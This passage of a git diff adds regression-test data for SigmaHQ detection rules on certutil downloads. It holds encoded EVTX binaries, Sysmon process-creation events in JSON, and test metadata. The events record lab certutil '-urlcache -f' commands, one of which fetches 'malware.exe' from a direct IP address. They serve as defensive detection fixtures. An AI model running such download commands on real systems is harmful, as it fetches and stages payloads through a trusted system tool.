z$w{Wp#;@)a{Nc+HBOut!_|cTNTFp9}{M|So#IXqnoB8e5c`I7NUYxh#U>CsdLUj>7 z@fe=*91?1j*AG+yD-p=;_7D6ju@>Nuy$kUn!fo<_k7)d zF8dHAFLwKf(Q2j;W~88p7_kj^+CgUowS>C2h#JIJei}3<c`}&A2 zCr&yMIhdG7JhlM29?XjqFDXQjQj2U|rXeYgH&|DAZxa8t@v&f;A57^Oa?ZAI5l@eb zLpaocVobIjtfj20IWvTHiennKchvIZIG=;zL7v&>ve$2sHE$fhj8AJ}r@S)>+B+pj zqoBcaW%w}Ed;twU9hPOo5@N|xkKFFHf(NECjU484k-M*SOV^48Xi*aBtM+ROd@Le$ z6>}cX(#Xd#| zlZ8&~0j-$mfrhfKWKe6Ut-a`jQt~px1GP?vP;<2pxxP68NUA zxH~ZZV(1=(C(RgsyYbtJa2=q{yD1r>1NUQAEL9)6LAecgydhqLaa_nnQ5mGI*D%-cM~!l<}!_g>G7Mw(TOzKPOzlj zX*`?VN^=pd(UY6XX^m!NOQPDK>p-{ER?HqR0&dIIFfhwXL_EW?DtF^nF>6u|Ay>8{ zZv>f=tw&mH#jM6b5?jGqEZ0gr2%28jVM3-?%qlEy4Q@vKqE;ZQ^O{(HZ6NG!^+_|~ z;#hlsS5IpX$N-p;pA!#!Wh6z6Oj~=`^eStws$#7@(ce?E>E)@R13LzMsjB5EKoSY zJ&0B^jS;eC4-PnJ#@uK&7NMy|y_UV$@1VESjb4L|o*jXqje&6_NBT(zHEEv}%Dmo2 zEq`2XS(+tFju78Gdf*B4{9cj^D%+rB$$8UMlB+2*ule-y^J-bL8Hdbhi8!<*jByIb zHp<>o=o|Hg)|x+DD>hL6Jq}vZS}T-)EqXWF$J6MkNRxDy?c7@(G^90ENP_@oPHXju zY}wu|nM%HNa#Uy!2SgaG6k0p9Sn{o(5m+t(u|Y(G%F>~=vyv6lj=r5E7Frb?m2uo~ z=g}OW`an2{4h+(UI1m|<|N=@SB zazu-26eVAJ-CZj_Xoq^&Q)daS4If>QMZ7FcSt~w>lO)P0m;5$WX>A&<>mXX_7$iG} zHm8_$OKIuZ$`k21bRM?pd0DgQ0MR)Ck>tcx?!#+sbj-@EqN_&Adx6pu`z> z8pTCt+Al`{&l&a&c<3>+&ay2sqt3bc6=u?RBZ$E~h_M*V<2+}$pKxFv!{4xD9@iSo z!(bk0XzaL-!8|Z#amP^%=AnJ$s^OMZ8JGuWY%2%zxa!rj*~g-&Q$SAsDdL4mIPK6e zSV5e-Rp^O9GfKln44P4joD7;#h_kulA_mP+2(HFN6LNmLn7v&n*R?_s44Oe7AbR8Md`7745-sS4E*2|9$6~>~ZNcx7+_9{6Lfk zhw?4rDhKLW1YW6Xr3^ighcH9?ki6#FIQ5L4A(OcOAf9veWA57E9h8|94f65>F?ff; zJB;_nh~*`<`d%c)dxIWz8vh}-V7xcHy*ISManCRE@Q&}}{FK2vCNK~;-Wz(=v%x#0 z17E>D24=-dk^KoyIq;4@J!Qu`A_ng;c!$9|@^|hrc*j!7YfUP{dtPcE+Z@B9cn8Tt{3M@bM72*7#6+TU4wNPtV3H?W~EA@=YYFMhQT@v)={V_Yvp5N zunvqR>3Hb6QbijZdtb=II{p&ppEFp8!8*)J6|++10`_A3oCE9l?%&w4jx7f3Fjxn= zCga;7=iJ%j7_8$`!#Z|U6xQ({&1bVmti8dm#@bu=J-+Cx!5wABfo*WVJhMK<_-m*g zQw)YtXqg%egZp2*?QXg@HoIA$VqdRg{53Ev!Y6{mZMO|=M2Ks!@ibryd7Q(^&kTlP zFbsoX7!2bAFpQr$FpMjow__OB84SZ<80d8jhG8&_OLm9R$0`cLxMK6!>?jwHVz-UO z<@G5Ct$hP&iteA@?QZ4yc{joz9>m#>2yScz9s| 
z1|9K|j6p~2tGd=k9tIs@Kk1E*X!B&R*^5*Nvll5}5NY1Of>|&1cFqK9j@gS;obTH< zoqLgf?C?nL$SkI&#UPBbBum>F3v-&7S7lG=Yxn#;zys9v;r!C(K@? zdS?OS>tTF7+&vl$nqkn4(%y+_(2P>vE4$inR?+6fv44SYhxYaOCQiO+d_9b>hw=3= zXvPKjdVJC0>v8)(+R==U8Z^V883xTTdvjdMZQv z7T~ingLN$CeX+`Fb7DSb$5A(Hu2eahH>{Ml7RJ0`#lB+0tYERr!}w?rt@rlP&}K#d znLJeE$2jM%9OexxX2((N_RlwJn>Vb$ZG%H^v*Re1y5SQLA$f#~>^S;@1J#&%!H#O& zU{DQ%YCxNekB0HlxMY1a#w!ZdcpW>Ap0jow{r2@5)hPCcl>^voRQpR0V82nmS!G`K z`SS&9?+c%r^(kh3idmoH<+orwI=m#aHXaNH`!LuC`!T*nY*F@M(o*r)gEm#fANGqz z@-*O}8FQoAScK*PO41*$5+Ty-chKAEMz6s}Zy3A8b5FHVP*T)jnv+`6L2a8GwR#)1 z0gU@b<^F8`aCMoI^L{U6PIAFACFf03<+Y~Fyynx(&ud8KHRF(3i<`{CqF>e#Dmr(v zOF~;TIOGr4iVc*1kAv0?ZnSFQMa?=k4V`7ZyVT})xqiP%G)gc?ziaZJYkhdryEg??QK5yL%SQtFq+#T$j|Fd?xT<<=RZ2cr#w9M^DRF`XD?{( zN9&srgQ6FDeE?^<_qTO`)&xp#!jq!2$7z++hG9weN&P04d<<>uJZ8|j$H9nrK<;!9 zMLO+LA7Y{#cT+Nq>WwDRDzSg#?g`v8QrjHu;t;s$t`KfIpvN8H%}d%BS2p92CCk4u zxEVu9MIoQc;HC{@smjsfHk8t2#nh=7YGpCKae6S!U>rIoYwHAZk*l5EsLzLxGp{mt zwmwOWuI@mqvkxN~wnsTyG4u^F+*>VbU1&8rk;3Zm)`b#m19z)Kjd_iOyVaqldf!83 zP%GXCutXCm@93&g?2!Hb1aw8`_`~kyZ-RDoL*EYN)yfZ_C)I{V(Z^JdoJOUTsAHAG z6ZLZ(HK?50ov-t%?{^?_c; zjtCp96X@T(#9kL+0TK1jH9bU$4c5tb)YRGVYCS6VhwBxBTk_j#^O4{jm35#J5SVnp zRF4n#XAaw>!l_0j&{;89=NJ$V+Q(it z(Z$6&iRX>y+3JNB+QsJP5Xz}iF!DBNP32(Z23>UD{iPW4Y0$-4)NbYP;Px({eC)<; z&Wf{&23;(^!}v`W#%0jOmE>g5#d(a5`HA3gdn=MQ?~Cn~zuJiAa~7mfEKTz4&GlE7 zDHM(#obyx%<-GX*f;p;5jE5#skG#f2rP5)Kt!9$Tms0sLic979I+a^m7A+`!RJ6zU z5!oKoQ)~hLN9tJw8nIgG`@j};>tx_r$zb3YfT=Z7{e7IA!eNkVgH#)&y6&}F2V5lm zSVJNde6%|R3FUhT%15;#ROM?Dn^CtO8Lfd;p9S_bi!W<3H|lNz4&qx{+K-D}vmxn> zGXvMqqtfAx9e}^uca_AeTHwt?kJJ`9yVZ(&i}=!y?S8Zlq{_Fwwt_D4EPA@pIj#*P zo@@=F9i6~k`djjCu*Y%t3LL@7!QjR4%9ZOA;UJ16<>$ny8^8DTD|ueIFPwWuKB%r- zuiQ@$EGFv5cHQgy#N#iXJNUH?pARm3<$e~YmF<YzuXJ)3M?-0SgV;zOO7@E%mKr;=TvBYg zxfot)o}$@UrXM@k6Vij4`zWdQe-Kv>;FyMd*$08cE{A;ielAD742nG{b2S=WK4FWIu(wPa%*xTa+M2v z5>;!Q`1Ui1Z_f+w*jM*(WEQ~)EVugCNk?%pk37?3JI8^S6t1&oi0o;*?Rvfv1+7CX zdHR=cakBJJ-f<@T))zRu6+-{|alS{EX%wY9S7v_zq}j48H80 
zIEc)4;5UY_T;sssB+5OFa!=q$B0T3wx}`6DLWbS}pZzo_^&n;k=#okXcSwoh;_^Oy zU8$*YNj-z}1g<(D-7ciW_))RL;*y+of?f=<(+H75+-^K)j82(C9RKNS--c&>2$Mlb zb*?#NoCLx!&!o<^l%&CMAKSEsa*s2L4S{-UzrDI z8n58W16A)vq<*XCIXpwx?2CnUXk%mUJzyL7lgDc~IgP_$9R}+#Sckzn&UXd!X$RKv z57FQGi+rr(_J1>2hi?s6AScnH+wDYyb(ACzgLS|paItvnF`6R!Vz3VTE&?^MD>YtX zuns3u(u^^>!8-D>!L`OZdVx_8>$nAn#yU3RyaUHp95>>~$2x!y+OQ7pn@+rg;Yz_e zX#Wv=pzTI$_cXAMyDh9^)5g+mD9+<>r}Hf86L(fQ2C95J{RHf$)k8b>Skxm0(^wH8 zEJPg&k&Fn&!HTa1*qenrq^vda;Vl#IClRcH??-FB7m_FN!uoKh5Zz$v8VQ*?*WHp9`HLY;6!iM=B^}lSrpjCp+2Fcn zVh)|S!#ogsA*K_x&e}kURGCB4jpKO=XT(dK=td0Bh~O}9TrWzR8JQPyK!igfC`2}x zzQT@ppB^4+r;CrHw73-x(T&$JUFWV3`DLf}X;=VuF}7SUb**%dy^x3S6^k7~+j2j& zY!;fii2BYH7I57HbcFwTen6(mm5h3yo>KHuW)QLM{z5+MS{okX=Xtoti#UJQ;2!49 zTIS7K=FM6cu=Cop4%}l`&;R!2;~syu%itac_gLO>j%&<}kH;ub1@=AFK6-~49}kGa zj#U{Sk3xxftlu?09_8)En2*i;rucZ!PebD#JRiY9Ok^b=k4}UkW>Sie2R%J#x6ucK zmLF~5C~%M4EZpPQ%RBYiXNKKY6mi}4JZvDkyVA=-+gI+W2klN;l;!z&q^vZ!Uuk|C L7a!4Z;pG1SB-pzk literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json new file mode 100644 index 000000000..27dce7a6b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:02:36.900637Z" + } + }, + "EventRecordID": 11537869, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:02:36.894", + "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", + "ProcessId": 6484, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": 
"\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml new file mode 100644 index 000000000..c9bf97f46 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml @@ -0,0 +1,13 @@ +id: ee435dcb-08cb-4de1-bb70-bdd27cf0dae9 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b + title: Suspicious Download Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx 
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx new file mode 100644 index 0000000000000000000000000000000000000000..73837d70cead0db7e76f7fd44a9584cd14854af1 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json new file mode 100644 index 000000000..5de823e73 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:01:06.116464Z" + } + }, + "EventRecordID": 11507958, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:01:06.109", + "ProcessGuid": "5AA13A44-0252-68FD-7235-000000004002", + "ProcessId": 6432, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f http://10.0.1.14/malware.exe malware-ctl.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
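Review bot: this sample exercises one URL shape only (`http://`, dotted IPv4 `10.0.1.14`, no port, a single path component), so the regression pins the rule to the narrowest reading of "direct IP" and would not notice a change that breaks matching on `https://`, a `:port` suffix, or an IPv6 literal. If the rule is meant to cover those forms, add one variant event per form and raise `match_count`; if it is not, record that scope in the info.yml description rather than leaving it as `N/A`.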
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml new file mode 100644 index 000000000..77577cd85 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml @@ -0,0 +1,13 @@ +id: 76e024fd-9064-46ae-85f8-c524dc6b3492 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 + title: Suspicious File Downloaded From Direct IP Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx 
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx new file mode 100644 index 0000000000000000000000000000000000000000..bfc51182e6d657c863f25b0579847d7f35f18058 GIT binary patch literal 69632
diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json new file mode 100644 index 000000000..27dce7a6b
--- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:02:36.900637Z" + } + }, + "EventRecordID": 11537869, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:02:36.894", + "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", + "ProcessId": 6484, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": 